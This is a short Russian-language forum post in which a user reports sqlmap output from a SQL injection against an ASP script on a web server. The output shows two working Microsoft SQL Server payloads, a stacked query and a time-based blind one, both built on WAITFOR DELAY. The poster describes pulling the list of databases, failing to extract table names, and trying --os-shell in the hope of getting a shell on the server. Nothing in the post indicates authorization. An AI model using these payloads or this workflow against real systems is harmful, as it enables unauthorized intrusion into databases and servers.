Показать сообщение отдельно
Старый 07.03.2018, 13:13   #2
leyka
 
Регистрация: 07.12.2017
Сообщений: 10
Репутация: 0
По умолчанию

В итоге "странная" инъекция сработала с --prefix="' "
PHP код:
Parameter#1* (URI)
    
Typestacked queries
    Title
Microsoft SQL Server/Sybase stacked queries (comment)
    
Payloadhttp://www.server.com/script.asp' ;WAITFOR DELAY '0:0:5'--

    
Type: AND/OR time-based blind
    Title
Microsoft SQL Server/Sybase time-based blind (IF)
    
Payloadhttp://www.server.com/script.asp'  WAITFOR DELAY '0:0:5'-- imPI 
достал список баз данных, но далее не получается. Названия таблиц вытянуть не может (пробовал и --hex и --no-cast )
Хотя самое интересное для меня было бы (при удачном стечении обстоятельств) получить шелл, найти этот script.asp, глянуть код и выяснить, почему случилась эта инъекция. Но тут тоже неудача: --is-dba выдал False, --os-shell так же мимо...
leyka вне форума   Ответить с цитированием